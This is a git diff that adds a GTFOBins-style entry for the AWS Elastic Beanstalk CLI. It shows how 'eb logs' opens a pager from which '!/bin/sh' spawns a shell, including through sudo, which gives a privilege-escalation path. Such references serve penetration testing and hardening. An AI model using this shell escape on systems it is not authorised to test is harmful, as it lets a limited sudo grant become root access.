diff --git a/_gtfobins/eb.md b/_gtfobins/eb.md new file mode 100644 index 0000000..420d4fd --- /dev/null +++ b/_gtfobins/eb.md @@ -0,0 +1,12 @@ +--- +description: This invokes the default logging service, which is likely to be [`journalctl`](/gtfobins/journalctl/), other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI. +functions: + shell: + - code: | + eb logs + !/bin/sh + sudo: + - code: | + sudo eb logs + !/bin/sh +---